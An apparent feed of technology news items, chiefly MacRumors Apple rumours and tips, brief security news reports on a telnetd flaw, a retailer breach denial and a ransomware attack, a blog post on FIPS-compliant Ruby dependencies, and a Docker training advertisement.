Not only will the MacBook Pro be moving to OLED, but the displays will apparently have touch-screen capabilities too. This functionality would allow Mac users to use both their fingers and a keyboard and mouse/trackpad for input.

Steve Jobs said that a touch-screen Mac would cause arm fatigue, but he made that comment a long time ago, and Apple does reverse course from time to time.

Dynamic Island

Yet another display-related change on these MacBook Pro models will be a hole-punch camera, according to Gurman. As a result, he said that the MacBook Pro will no longer have a notch. Instead, he expects a Dynamic Island or something "similar."

With a Dynamic Island, the MacBook Pro would move one step closer to a truly edge-to-edge display with thin bezels. Like on the iPhone, the Dynamic Island would display things such as low battery life alerts and AirPods connection indicators in the area surrounding the hole-punch camera at the top-center part of the screen.

M6 Pro and M6 Max Chips

This one is obvious, but the two-generations-away MacBook Pro models will be powered by Apple's two-generations-away M6 Pro and M6 Max chips. Notably, these chips are expected to be manufactured with TSMC's advanced 2nm process, which should result in greater year-over-year performance and efficiency gains than usual.

The current M4 Pro and M4 Max chips and the upcoming M5 Pro and M5 Max chips are or will be built with TSMC's 3nm processes.

Thinner Design

Yet another MacBook Pro rumor shared by Gurman is a thinner design versus existing models.

The move from LCD with mini-LED backlighting to OLED would contribute to the thinner design, and there could be other changes that help to slim things down.

As of now, there has been no indication that Apple plans to once again remove ports like HDMI, MagSafe, or the SD card slot in order to achieve this thinner design, but we shall see. That was a very unpopular decision the last time it happened.

Cellular

Macs can already connect to a cellular network via the Personal Hotspot feature on a nearby iPhone or iPad, but Apple has reportedly at least considered built-in cellular connectivity for future Macs. If these plans moved forward, the MacBook Pro would likely be equipped with Apple's C1X or future C2 modem for 5G and LTE.Related Roundup: MacBook ProBuyer's Guide: MacBook Pro (Caution)Related Forum: MacBook Pro
This article, "MacBook Pro to Receive Up to Six New Features by Next Year" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple's Siri Chatbot May Run on Google Servers

Apple is considering a significant shift in how it operates Siri by potentially running its next-generation chatbot on Google's cloud infrastructure rather than entirely on its own Private Cloud Compute servers, according to Bloomberg's Mark Gurman.


In yesterday's report detailing Apple's plans to turn ‌Siri‌ into a chatbot in iOS 27, Gurman said that the company is in discussions with Google about hosting the forthcoming ‌Siri‌ chatbot on Google-owned servers powered by Tensor Processing Units (TPUs), a class of custom chips designed specifically for large-scale artificial intelligence workloads. The arrangement would mark a major departure from Apple's emphasis on processing user requests either directly on-device or through its own tightly controlled Private Cloud Compute infrastructure.



The near-term ‌Siri‌ improvements in iOS 26.4 are still expected to run on Apple's own Private Cloud Compute servers, which the company unveiled in 2024 as a privacy-focused alternative to on-device processing. Private Cloud Compute relies on Apple-designed servers built around high-end Mac chips, and Apple has positioned the system as one where user data is processed temporarily and not retained, not even being accessible to Apple itself. Those claims have been central to Apple's public messaging around Apple Intelligence.

The more advanced ‌Siri‌ chatbot planned for the following major operating system update is expected to rely on a newer and more capable large language model developed by Google. This model is internally referred to as Apple Foundation Models version 11 and is comparable in capability to Google's latest Gemini models. Running such a model at scale may exceed the practical capacity of Apple's current Private Cloud Compute infrastructure, prompting the need to use Google's significantly larger, specialized cloud footprint and AI hardware.

The possibility of running ‌Siri‌ requests on Google servers does not necessarily mean Google would gain access to user data in a conventional sense. Apple already relies on third-party cloud providers, including Google, for parts of iCloud's infrastructure, while retaining control over encryption keys and data handling policies. Tags: Bloomberg, Google, Mark Gurman, Siri
This article, "Apple's Siri Chatbot May Run on Google Servers" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Critical GNU InetUtils telnetd Flaw Lets Attackers Bypass Login and Gain Root Access

A critical security flaw has been disclosed in the GNU InetUtils telnet daemon (telnetd) that went unnoticed for nearly 11 years. The vulnerability, tracked as CVE-2026-24061, is rated 9.8 out of 10.0 on the CVSS scoring system. It affects all versions of GNU InetUtils from version 1.9.3 up to and including version 2.7. "Telnetd in GNU Inetutils through 2.7 allows remote authentication bypassView the full article
Hacker News

Enable Smoother 120Hz Browsing in Safari

Any iPhone, iPad, or Mac with a ProMotion display is capable of rendering buttery smooth 120Hz animations. However, Apple's Safari browser is locked to 60fps page rendering by default, making scrolling feel noticeably choppier for some users than in Chrome or Firefox. Thankfully, recent versions of Safari include a hidden setting that lets you unlock 120Hz rendering.


At 60Hz, your screen refreshes every 16.7 milliseconds, meaning each frame of a scrolling page stays on screen for that duration. At 120Hz, the refresh interval drops to 8.3 milliseconds, so the image updates twice as often. This reduces the perceived blur and judder as content moves across the screen, making motion look more fluid and responsive. For a better idea of the difference, visit Blur Buster's Motion Tests webpage and watch the refresh rate test in Safari.

The difference is most noticeable when scrolling text-heavy pages or panning across detailed content. That said, the improvement is more dramatic for some people than others. If you've never noticed Safari feeling "off" compared to other apps, you may not register much difference. But if you've used Chrome or Firefox on the same device and wondered why Safari felt slightly sluggish, this is the reason.

The 120Hz option is buried in Safari's Feature Flags, a developer-focused menu that doesn't require any special mode to access on iPhone or iPad. On Mac, you'll need to enable developer features first, but it's a straightforward process. Keep in mind that turning on 120Hz may impact your device's battery life if you tend to browse a lot.

Here's how to enable 120Hz scrolling on all your Apple devices.

Enable 120Hz Safari Browsing iPhone and iPad


Open the Settings app.
Scroll down and tap Apps.
Tap Safari.
Scroll to the bottom and tap Advanced.

Tap Feature Flags at the bottom of the list.
Scroll to Prefer Page Rendering Updates near 60fps and toggle it off.
Force quit Safari and reopen it.

With this setting disabled, Safari will now render pages at up to 120Hz on ProMotion-equipped devices, including iPhone 13 Pro and later, and iPad Pro models with ProMotion.

Enable 120Hz Safari Browsing on Mac

Enabling 120Hz on Mac requires a few extra steps to reveal the Feature Flags menu.

Open Safari, then click Safari in the menu bar and choose Settings....

Click the Advanced tab.
At the bottom of the pane, check the box next to Show features for web developers.

A new Feature Flags tab will appear in the toolbar – click it.
In the search field at the top right, type 60fps.
Uncheck Prefer Page Rendering Updates near 60fps.
Quit Safari completely and reopen it.



This works on any Mac with a ProMotion display, which includes the 14-inch and 16-inch MacBook Pro models introduced in 2021 and later. If you have external displays connected to your Mac that are capable of refreshing at 120Hz, they should also benefit from the change.

Kudos goes to MacStories for unearthing the 120Hz scrolling tip recently shared by developer Matt Birchler.Tag: Safari
This article, "Enable Smoother 120Hz Browsing in Safari" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Amazon Discounts Popular Accessories From Ecovacs, Jackery, and Anker

Amazon this week has a few notable sales from popular brands like Ecovacs, Jackery, and Anker. These include discounts on everything from MagSafe-compatible chargers to portable power stations and robot vacuums.

Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

The highlight of the sale is Ecovacs' range of robot vacuums and mops, with as much as $500 off these devices this week. You can get the Ecovacs Deebot T80 Omni Robot Vacuum and Mop for $499.99, down from $999.99. Another notable discount can be found on the Ecovacs Deebot X8 Pro Omni Robot Vacuum and Mop for $749.00, down from $1,099.00.

$500 OFFEcovacs Deebot T80 Pro Robot Vacuum for $499.99
$350 OFFEcovacs Deebot X8 Pro Robot Vacuum for $749.00

Additionally, Amazon has discounts on multiple Anker charging accessories, including products like the 3-in-1 MagSafe-Compatible Charging Cube for $97.49, down from $149.95 and the SOLIX C300 Power Station with Lantern for $179.99, down from $249.00. You can find these deals and more in the lists below, and this time around none require any coupon codes.

Ecovacs

Deebot N20 Robot Vacuum Cleaner and Mop - $161.49, down from $199.99
Winbot Mini Window Cleaning Robot - $189.00, down from $239.00
Deebot T80 Omni Robot Vacuum and Mop - $499.99, down from $999.99
Deebot X9 Pro Omni Robot Vacuum and Mop - $699.00, down from $799.00
Deebot X8 Pro Omni Robot Vacuum and Mop - $749.00, down from $1,099.99
Deebot X11 OmniCyclone Robot Vacuum and Mop - $1,099.00, down from $1,499.99
Anker

6-in-1 USB-C Power Strip - $59.99, down from $109.99
MagGo UFO 3-in-1 Qi2 Charger - $61.98, down from $89.99
140W 4-Port GaN USB-C Charger - $64.99, down from $99.99
3-in-1 MagSafe-Compatible Charging Cube - $97.49, down from $149.95
14-Port Prime Docking Station - $169.99, down from $269.99
SOLIX C300 Power Station with Lantern - $179.99, down from $249.00
SOLIX C1000 Gen 2 Portable Power Station - $449.99, down from $799.00
SOLIX C2000 Gen 2 Portable Power Station - $799.00, down from $1,499.00
Jackery

Explorer 300 Portable Power Station + Solar Panel - $349.00, down from $499.00
Explorer 1000 V2 Portable Power Station - $399.00, down from $799.00
Explorer 1500 Portable Power Station - $898.99, down from $1,399.00
HomePower 3000 Portable Power Station - $1,199.00, down from $2,499.00
HomePower 3000 Portable Power Station + Solar Panels - $1,598.99, down from $2,999.00
HomePower 3600 Plus Portable Power Station - $2,099.00, down from $3,699.00

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Amazon Discounts Popular Accessories From Ecovacs, Jackery, and Anker" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Utah Adds a Strange Twist to the iPhone vs. Android Debate

While the iOS vs. Android debate has been going on for nearly two decades, one lawmaker in Utah has taken it to the next level with a strange new twist.


According to Utah news station KSL, Utah State Senator Kirk Cullimore (R-Sandy) has proposed a new bill that would designate Android as the state's official mobile operating system. It is a real bill that would amend an existing Utah law outlining the state's official bird, fruit, song, flower, dinosaur, winter sports, and more.

"Utah's state mobile operating system is Android," the proposed amendment reads.

"Someday, everybody with an iPhone will realize that the technology is better on Android," said Cullimore, according to the report. "I'm the only one in my family – all my kids, my wife, they all have iPhones – but I'm holding strong," he added.

The change would take effect on May 6, if the bill were to be passed and signed into law. However, it seems to be a publicity stunt more than anything.

"I don't expect this to really get out of committee," said Cullimore.Tag: Android
This article, "Utah Adds a Strange Twist to the iPhone vs. Android Debate" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Report: Apple's New AI Strategy Firms Up Under Craig Federighi

Apple has restructured its artificial intelligence strategy under software chief Craig Federighi, accelerating plans to overhaul Siri by relying on external AI models after years of internal delays and organizational friction.


According to a detailed report from The Information, Apple's approach to artificial intelligence has undergone a significant shift over the past year. Apple software chief Craig Federighi is said to be at the center of that shift, having assumed direct oversight of the company's AI organization and is now driving decisions that will shape the future of ‌Siri‌ and other Apple Intelligence features across the product lineup.

Last fall, Federighi apparently addressed a joint meeting of Apple's software and AI teams, expressing enthusiasm for closer collaboration while also signaling dissatisfaction with the company's pace of progress in artificial intelligence. Some members of Apple's foundation models team interpreted the remarks as criticism of their work.

In December, Apple moved to consolidate its AI leadership under Federighi, completing a transition that had begun earlier in the year when responsibility for ‌Siri‌ was removed from the AI group and brought under Federighi's software division. In January, Apple announced plans to use Google's Gemini AI models to power future AI upgrades, including an improved version of ‌Siri‌. In Federighi's view, integrating a third-party model would allow Apple to finally ship a revamped ‌Siri‌ later this year after controversially postponing the update in 2025.

However, the report also outlines internal concerns about the implications of placing AI under Federighi's control. People who have worked closely with him described him as highly cost-conscious and skeptical of investments with uncertain returns. This approach stands in notable contrast to rivals such as OpenAI, Meta Platforms, and Google, who invest tens of billions of dollars in data centers, chips, and AI researchers.

Apple has attempted to limit infrastructure spending by emphasizing on-device processing and its Private Cloud Compute system, which uses Apple silicon. The company was said to be waiting for the cost of AI computation and talent to decline, betting that most consumer use cases will eventually be handled locally on devices.

Federighi apparently viewed AI as unpredictable and difficult to control, preferring deterministic software behavior that could be clearly specified during design reviews. He rejected proposals to use AI to dynamically reorganize the iPhone home screen, arguing that such changes would confuse users.

Tensions over AI strategy have surfaced internally before. Around 2019, Mike Rockwell, who was leading development of the Vision Pro headset, reportedly proposed an AI-driven interface. He criticized Federighi's software approach as overly conservative, prompting a rebuke. Rockwell was later placed in charge of ‌Siri‌ in early 2025 and now reports directly to Federighi.

Despite his earlier skepticism, Federighi's stance shifted following the release of ChatGPT in late 2022. People close to him said he became convinced of the potential of large language models after experimenting with the technology and instructed his teams to explore ways to integrate similar capabilities into Apple products. Federighi reportedly concluded that Apple's internal models did not perform adequately on devices, while members of the foundation models team believed they were being blamed for challenges related to model optimization, which fell under the software organization's responsibilities.

Some team members complained they were not given sufficient guidance on how their models would ultimately be used, limiting their ability to compete with external alternatives. Around the time Apple removed ‌Siri‌ oversight from Giannandrea and assigned it to Rockwell, with Federighi directing the broader effort, Federighi instructed teams to evaluate deep integration of third-party models.

Despite the partnership with Google, Apple plans to continue developing its own AI models, particularly those designed to run on devices. Apple reportedly intends to shrink and adapt models derived from external partners so they can run more fully on Apple hardware, reducing long-term dependence. To support that goal, Apple is said to be considering acquisitions of smaller AI firms specializing in model compression and optimization.

See The Information's full report for more.Tags: Apple Intelligence, Craig Federighi, The Information
This article, "Report: Apple's New AI Strategy Firms Up Under Craig Federighi" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

ThreatsDay Bulletin: Pixel Zero-Click, Redis RCE, China C2s, RAT Ads, Crypto Scams & 15+ Stories

Most of this week’s threats didn’t rely on new tricks. They relied on familiar systems behaving exactly as designed, just in the wrong hands. Ordinary files, routine services, and trusted workflows were enough to open doors without forcing them. What stands out is how little friction attackers now need. Some activity focused on quiet reach and coverage, others on timing and reuse. The emphasisView the full article
Hacker News

Your Dependencies Don’t Care About Your FIPS Configuration

FIPS compliance is a great idea that makes the entire software supply chain safer. But teams adopting FIPS-enabled container images are running into strange errors that can be challenging to debug. What they are learning is that correctness at the base image layer does not guarantee compatibility across the ecosystem. Change is complicated, and changing complicated systems with intricate dependency webs often yields surprises. We are in the early adaptation phase of FIPS, and that actually provides interesting opportunities to optimize how things work. Teams that recognize this will rethink how they build FIPS and get ahead of the game.
FIPS in practice
FIPS is a U.S. government standard for cryptography. In simple terms, if you say a system is “FIPS compliant,” that means the cryptographic operations like TLS, hashing, signatures, and random number generation are performed using a specific, validated crypto module in an approved mode. That sounds straightforward until you remember that modern software is built not as one compiled program, but as a web of dependencies that carry their own baggage and quirks.
The FIPS crypto error that caught us off guard
We got a ticket recently for a Rails application in a FIPS-enabled container image. On the surface, everything looked right. Ruby was built to use OpenSSL 3.x with the FIPS provider. The OpenSSL configuration was correct. FIPS mode was active.
However, the application started throwing cryptography module errors from the Postgres Rubygem module. Even more confusing, a minimal reproducer of a basic Ruby app and a stock postgres did not reproduce the error and a connection was successfully established. The issue only manifested when using ActiveRecord.
The difference came down to code paths. A basic Ruby script using the pg gem directly exercises a simpler set of operations. ActiveRecord triggers additional functionality that exercises different parts of libpq. The non-FIPS crypto was there all along, but only certain operations exposed it.
Your container image can be carefully configured for FIPS, and your application can still end up using non-FIPS crypto because a dependency brought its own crypto along for the ride. In this case, the culprit was a precompiled native artifact associated with the database stack. When you install pg, Bundler may choose to download a prebuilt binary dependency such as libpq.
Unfortunately those prebuilt binaries are usually built with assumptions that cause problems. They may be linked against a different OpenSSL than the one in your image. They may contain statically embedded crypto code. They may load crypto at runtime in a way that is not obvious.
This is the core challenge with FIPS adoption. Your base image can do everything right, but prebuilt dependencies can silently bypass your carefully configured crypto boundary.
Why we cannot just fix it in the base image yet
The practical fix for the Ruby case was adding this to your Gemfile.
gem "pg", "~> 1.1", force_ruby_platform: true You also need to install libpq-dev to allow compiling from source. This forces Bundler to build the gem from source on your system instead of using a prebuilt binary. When you compile from source inside your controlled build environment, the resulting native extension is linked against the OpenSSL that is actually in your FIPS image.
Bundler also supports an environment/config knob for the same idea called BUNDLE_FORCE_RUBY_PLATFORM. The exact mechanism matters less than the underlying strategy of avoiding prebuilt native artifacts when you are trying to enforce a crypto boundary.
You might reasonably ask why we do not just add BUNDLE_FORCE_RUBY_PLATFORM to the Ruby FIPS image by default. We discussed this internally, and the answer illustrates why FIPS complexity cascades.
Setting that flag globally is not enough on its own. You also need a C compiler and the relevant libraries and headers in the build stage. And not every gem needs this treatment. If you flip the switch globally, you end up compiling every native gem from source, which drags in additional headers and system libraries that you now need to provide. The “simple fix” creates a new dependency management problem.
Teams adopt FIPS images to satisfy compliance. Then they have to add back build complexity to make the crypto boundary real and verify that every dependency respects it. This is not a flaw in FIPS or in the tooling. It is an inherent consequence of retrofitting a strict cryptographic boundary onto an ecosystem built around convenience and precompiled artifacts.
The patterns we are documenting today will become the defaults tomorrow. The tooling will catch up. Prebuilt packages will get better. Build systems will learn to handle the edge cases. But right now, teams need to understand where the pitfalls are.
What to do if you are starting a FIPS journey
You do not need to become a crypto expert to avoid the obvious traps. You only need a checklist mindset. The teams working through these problems now are building real expertise that will be valuable as FIPS requirements expand across industries.
Treat prebuilt native dependencies as suspect. If a dependency includes compiled code, assume it might carry its own crypto linkage until you verify otherwise. You can use ldd on Linux to inspect dynamic linking and confirm that binaries link against your system OpenSSL rather than a bundled alternative. Use a multi-stage build and compile where it matters. Keep your runtime image slim, but allow a builder stage with the compiler and headers needed to compile the few native pieces that must align with your FIPS OpenSSL. Test the real execution path, not just “it starts.” For Rails, that means running a query, not only booting the app or opening a connection. The failures we saw appeared when using the ORM, not on first connection. Budget for supply-chain debugging. The hard part is not turning on FIPS mode. The hard part is making sure all the moving parts actually respect it. Expect to spend time tracing crypto usage through your dependency graph. Why this matters beyond government contracts
FIPS compliance has traditionally been seen as a checkbox for federal sales. That is changing. As supply chain security becomes a board-level concern across industries, validated cryptography is moving from “nice to have” to “expected.” The skills teams build solving FIPS problems today translate directly to broader supply chain security challenges.
Think about what you learn when you debug a FIPS failure. You learn to trace crypto usage through your dependency graph, to question prebuilt artifacts, to verify that your security boundaries are actually enforced at runtime. Those skills matter whether you are chasing a FedRAMP certification or just trying to answer your CISO’s questions about software provenance.
The opportunity in the complexity
FIPS is not “just a switch” you flip in a base image. View FIPS instead as a new layer of complexity that you might have to debug across your dependency graph. That can sound like bad news, but switch the framing and it becomes an opportunity to get ahead of where the industry is going.
The ecosystem will adapt and the tooling will improve. The teams investing in understanding these problems now will be the ones who can move fastest when FIPS or something like it becomes table stakes.
If you are planning a FIPS rollout, start by controlling the prebuilt native artifacts that quietly bypass the crypto module you thought you were using. Recognize that every problem you solve is building institutional knowledge that compounds over time. This is not just compliance work. It is an investment in your team’s security engineering capability.

View the full article
reporter

20th Anniversary iPhone May Not Have All-Screen Design After All

Apple has long been rumored to be planning a dramatic redesign for the iPhone's 20th anniversary in 2027, ever since Bloomberg's Mark Gurman reported last May that the company is aiming for an all-glass device "without any cutouts in the display." But new comments from respected display industry analyst Ross Young appear to throw cold water on these claims.


In a post on X (Twitter) yesterday, the former Counterpoint Research VP clarified remarks he made last June about Apple's display plans, saying he expects the smaller Dynamic Island rumored to be coming to iPhone 18 Pro models this fall to stick around through 2027.

In replies to follow-up questions, Young went further. The now-retired analyst said he still expects Apple's 2028 iPhone Pro models to feature a centered hole-punch cutout in the display – presumably housed within the same smaller Dynamic Island – rather than a true all-screen design. That timeline aligns with a roadmap he shared in June 2025, which predicted that a fully notch-free, truly all-screen iPhone wouldn't arrive until 2030.

If Young's predictions prove accurate, Gurman may need to revise his 20th-anniversary iPhone claims. Or perhaps not. One possibility is that Young's expectations are simply out of date. Supply chain timelines shift regularly, and Apple may have made more progress moving Face ID components and the front-facing selfie camera under the display than Young's sources indicate.

Alternatively, Apple could be developing a special 20th-anniversary model that sits above the iPhone Pro tier, similar to how the original iPhone X was unveiled at Apple's iPhone 8 launch in 2017 (Apple introduced its first Pro models with the iPhone 11 Pro and iPhone 11 Pro Max in September 2019). Such a device could debut the all-screen design Gurman has described, while the standard Pro models retain a smaller Dynamic Island.

Apple is expected to unveil the iPhone 18 Pro and Pro Max this September. The 20th-anniversary iPhone – whatever form it takes – will presumably follow in fall 2027.Tags: 20th-Anniversary iPhone, Ross Young
This article, "20th Anniversary iPhone May Not Have All-Screen Design After All" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Spanish e-retailer PcComponentes denies report it was hacked

Spanish online electronics retailer PcComponentes has denied a hacker’s claims to have stolen data on its customers.
Hackrisk.io, a strategic cyber threat intelligence platform developed and maintained by Hackmanac, reported that a malicious actor using the alias ‘daghetiaw’ claimed to have hacked the e-commerce company, adding that it was attempting to verify the claim.
According to Hackrisk.io, the hacker allegedly stole data relating to 16.3 million people, including tax identification numbers, orders, invoices, addresses, contact details, Zendesk tickets, credit card metadata, IP addresses, and purchase information. The platform notes that the hacker has shared a sample of 500,000 lines as proof of the data theft from PcComponentes.
CSO contacted PCComponentes, which issued a statement explaining that there had been no unauthorized access to its databases or internal systems.
“What we have detected is a phenomenon known in cybersecurity as credential stuffing. This means that a third party has used email addresses and passwords obtained from security breaches in compromised databases outside of PcComponentes,” the statement said, adding, “The categories of data affected are: name, surname, ID number (in cases where the customer has entered it), address, IP, email, and telephone number.”
PcComponentes said, “The figure of 16 million customers allegedly affected is false, as the number of active accounts on PcComponentes is significantly lower. Furthermore, the illegitimate access has not been widespread, meaning that only some customers have been affected.”
It also explained that bank details have not been compromised in any case, “since PcComponentes does not store them, but only keeps a security code (token) that is used to identify the payment, but does not allow the card to be viewed or charges to be made on its own. This code has no value outside the payment system and cannot be used fraudulently. For this reason, there is no risk of bank details being stolen”; nor are customer passwords, as “they are never stored in our database. Instead, they are converted into a secret, encrypted code (hash). This code is irreversible, which means that neither we nor anyone else can see the original password.”
Finally, PcComponentes reports that it has implemented a series of measures aimed at minimizing the impact of this incident, which “significantly strengthen account protection and reduce the risk of illegitimate access from compromised databases outside PcComponentes that are published on the internet.”
This article originally appeared on Computerworld/CSO España.

View the full article
CSOonline

Hacker legen Websites von Conceptnet-Kunden lahm

fadfebrian – shutterstock.com
Der Regensburger IT-Dienstleister Conceptnet informiert derzeit auf seiner Internetseite über eine technische Störung, die durch einen Ransomware-Angriff verursacht wurde. Berichten zufolge haben sich die Täter um den 13. Januar 2026 Zugriff auf die IT-Infrastruktur des Unternehmens verschafft. „Dabei wurden zentrale Systeme – darunter Web- und E-Mail-Server – verschlüsselt“, erklärt das Unternehmen.
Wiederherstellung der Systeme dauert an
Der Angriff sei umgehend erkannt, isoliert und den zuständigen Stellen gemeldet worden, heißt es. „Externe IT-Forensik-Spezialisten arbeiten seitdem gemeinsam mit unserem Team mit höchster Priorität an der Analyse und Wiederherstellung der betroffenen Systeme“, versichert der IT-Dienstleister. Es sei jedoch noch nicht absehbar, ob und wann eine komplette Wiederinbetriebnahme aller Systeme möglich sein wird.
Nach eigenen Angaben betreut Conceptnet insgesamt rund 500 Kunden. Von dem Angriff betroffen sind unter anderem der Energieversorger REWAG, das Stadtwerk Regensburg und der SSV Jahn Regensburg. Man habe zahlreiche provisorische Websites eingerichtet und online gebracht, um die Zeit bis zur regulären Wiederherstellung zu überbrücken, so der IT-Dienstleister.
Wie die Mittelbayerischen Zeitung berichtet, kam bei dem Angriff möglicherweise auch eine KI zum Einsatz. Auch eine Lösegeldforderung steht demnach im Raum.
View the full article
CSOonline

A Comprehensive Guide to Onsite and Remote Docker Trainers in Bangalore

Introduction: Problem, Context & Outcome
Engineering teams in Bangalore often move fast, yet many still struggle with environment inconsistency and deployment failures. Code works on a laptop, then breaks in testing or production. Consequently, teams lose time debugging configuration issues instead of delivering value. Meanwhile, Bangalore remains India’s leading technology hub, where startups and enterprises rapidly adopt cloud, microservices, and CI/CD automation. In this environment, containerization has become a core requirement rather than an optional skill. Docker Trainers in Bangalore help teams package applications consistently, reduce deployment risks, and accelerate delivery across environments. In this blog, you will understand what Docker Trainers in Bangalore do, why Docker matters in today’s DevOps landscape, and how structured training improves real-world delivery outcomes for developers and organizations alike.
Why this matters: Consistent environments reduce failures and increase delivery confidence.
What Is Docker Trainers in Bangalore?
Docker Trainers in Bangalore are industry professionals who teach Docker with a strong focus on practical, production-ready usage. They move beyond basic commands and explain how containerization fits into modern software delivery pipelines. These trainers help developers package applications with all dependencies into repeatable containers. They guide DevOps engineers on building images, managing registries, and integrating Docker with CI/CD workflows. They also support QA, cloud, and SRE teams by ensuring testing and deployment environments remain consistent. In Bangalore’s diverse tech ecosystem, Docker trainers frequently work with startups, IT services firms, and global enterprises. Their training aligns with Agile practices, cloud platforms, and microservices architectures that teams use daily in real projects.
Why this matters: Practical Docker training prepares teams for real production deployments.
Why Docker Trainers in Bangalore Is Important in Modern DevOps & Software Delivery
Modern software delivery demands speed, portability, and reliability at the same time. Organizations in Bangalore deploy applications across cloud, on-premise, and hybrid environments. Docker Trainers in Bangalore help teams manage this complexity effectively. They solve problems such as “works on my machine” issues, manual deployment steps, and slow environment setup. Moreover, Docker training connects directly with CI/CD pipelines, cloud infrastructure, Agile workflows, and DevOps practices. Without expert guidance, teams misuse containers or treat Docker as just another tool. With structured training, teams build efficient, repeatable, and scalable delivery pipelines that support rapid change.
Why this matters: Correct Docker usage accelerates delivery without sacrificing stability.
Core Concepts & Key Components
Containerization Fundamentals
Purpose: Package applications with dependencies for consistency.
How it works: Trainers explain images, containers, layers, and isolation concepts.
Where it is used: Local development, testing, staging, and production.
Docker Images and Registries
Purpose: Store, version, and share application builds.
How it works: Trainers teach image creation, tagging strategies, and registry usage.
Where it is used: CI/CD pipelines and enterprise deployment workflows.
Docker Networking
Purpose: Enable communication between containers and services.
How it works: Trainers cover bridge networks, ports, and service discovery.
Where it is used: Microservices-based architectures.
Data Management with Volumes
Purpose: Persist data beyond container lifecycles.
How it works: Trainers explain volumes and bind mounts clearly.
Where it is used: Databases, stateful applications, and logs.
Docker Security and Best Practices
Purpose: Reduce container security risks.
How it works: Trainers introduce image scanning, least privilege, and secrets handling.
Where it is used: Enterprise and production environments.
Why this matters: These core components form the backbone of containerized systems.
How Docker Trainers in Bangalore Works (Step-by-Step Workflow)
Docker Trainers in Bangalore follow a structured, practical workflow. First, they review the team’s current development and deployment process. Next, they introduce Docker fundamentals using real application examples rather than abstract demos. Then, they guide teams through containerizing applications step by step. After that, they show how Docker integrates into CI/CD pipelines and cloud platforms. They also explain monitoring, logging, and operational considerations. Finally, teams learn how to document images, maintain containers, and support ongoing improvements.
Why this matters: Step-by-step learning ensures long-term Docker adoption.
Real-World Use Cases & Scenarios
Startups in Bangalore rely on Docker Trainers in Bangalore to speed up onboarding and releases. IT services companies adopt Docker to standardize delivery across multiple clients. SaaS platforms use Docker to scale microservices quickly. Developers focus on containerized builds. DevOps engineers manage images and automation. QA teams test consistent environments. Cloud and SRE teams deploy, monitor, and troubleshoot containers. Across industries, Docker training leads to faster releases, fewer environment issues, and predictable deployments.
Why this matters: Real-world use cases prove Docker’s operational value.
Benefits of Using Docker Trainers in Bangalore
Productivity: Teams eliminate environment-related delays Reliability: Consistent deployments reduce production issues Scalability: Containers support rapid horizontal scaling Collaboration: Shared images improve cross-team alignment Why this matters: Clear benefits justify Docker training investment.
Challenges, Risks & Common Mistakes
Teams often adopt Docker too quickly without understanding fundamentals. Some create large, inefficient images. Others ignore security best practices. Docker Trainers in Bangalore address these risks by emphasizing simplicity, documentation, and security hygiene from the start. They encourage gradual adoption and disciplined workflows instead of shortcuts.
Why this matters: Awareness prevents fragile container setups and outages.
Comparison Table
AspectTraditional DeploymentDocker-Based DeploymentSetupManualAutomatedEnvironment ConsistencyLowHighPortabilityLimitedStrongScalingSlowFastResource UsageHighOptimizedCI/CD IntegrationComplexSimplifiedRollbackDifficultEasyCollaborationFragmentedSharedCloud ReadinessPartialNativeReliabilityVariablePredictable Why this matters: Comparison highlights why Docker dominates modern delivery.
Best Practices & Expert Recommendations
Effective Docker Trainers in Bangalore stress simplicity first. They promote small images, clear tagging, and version control. They encourage early security scanning and proper secrets management. They align Docker usage with CI/CD goals and orchestration strategies. They also emphasize monitoring and documentation to support operations at scale.
Why this matters: Best practices ensure Docker remains secure and scalable.
Who Should Learn or Use Docker Trainers in Bangalore?
Developers gain skills in containerizing applications. DevOps engineers integrate Docker into CI/CD pipelines. Cloud and SRE teams deploy and manage containers at scale. QA teams benefit from consistent testing environments. Beginners build strong foundations, while experienced professionals optimize delivery pipelines.
Why this matters: Broad relevance strengthens organizational delivery capability.
FAQs – People Also Ask
What are Docker Trainers in Bangalore?
They teach practical Docker skills for real projects.
Why this matters: Clear scope improves learning focus.
Is Docker suitable for beginners?
Yes, structured training simplifies learning.
Why this matters: Beginners gain confidence early.
Does Docker replace virtual machines?
No, Docker complements virtual machines.
Why this matters: Correct understanding avoids misuse.
Is Docker useful in DevOps?
Yes, it supports CI/CD and automation.
Why this matters: DevOps relies on consistency.
Do trainers cover cloud platforms?
Yes, Docker runs on all major clouds.
Why this matters: Cloud compatibility is essential.
Is Docker secure?
Yes, when configured correctly.
Why this matters: Security reduces operational risk.
Can QA teams use Docker?
Yes, for stable test environments.
Why this matters: Consistency improves quality.
Does Docker improve scalability?
Yes, containers scale quickly.
Why this matters: Scalability supports growth.
Is Docker production-ready?
Yes, enterprises use it widely.
Why this matters: Proven adoption builds trust.
Is Docker a valuable career skill?
Yes, demand remains high.
Why this matters: Skills stay relevant.
Branding & Authority
DevOpsSchool is a globally trusted learning platform delivering enterprise-grade DevOps education. Through its structured programs, DevOpsSchool supports professionals and organizations looking for Docker Trainers in Bangalore with hands-on training, real deployment scenarios, and scalable delivery practices. Enterprises rely on this platform because it prioritizes execution, clarity, and measurable outcomes.
Why this matters: Trusted platforms ensure credible and consistent learning.
Rajesh Kumar is a senior mentor with more than 20 years of hands-on industry expertise. Through Rajesh Kumar, learners gain guidance in DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD pipelines, and automation. His mentorship bridges classroom learning with enterprise reality.
Why this matters: Proven mentorship accelerates real-world mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore professional Docker training programs designed for modern DevOps and cloud-native delivery teams.




View the full article
reporter

Actively exploited Cisco UC bug requires immediate, version‑specific patching

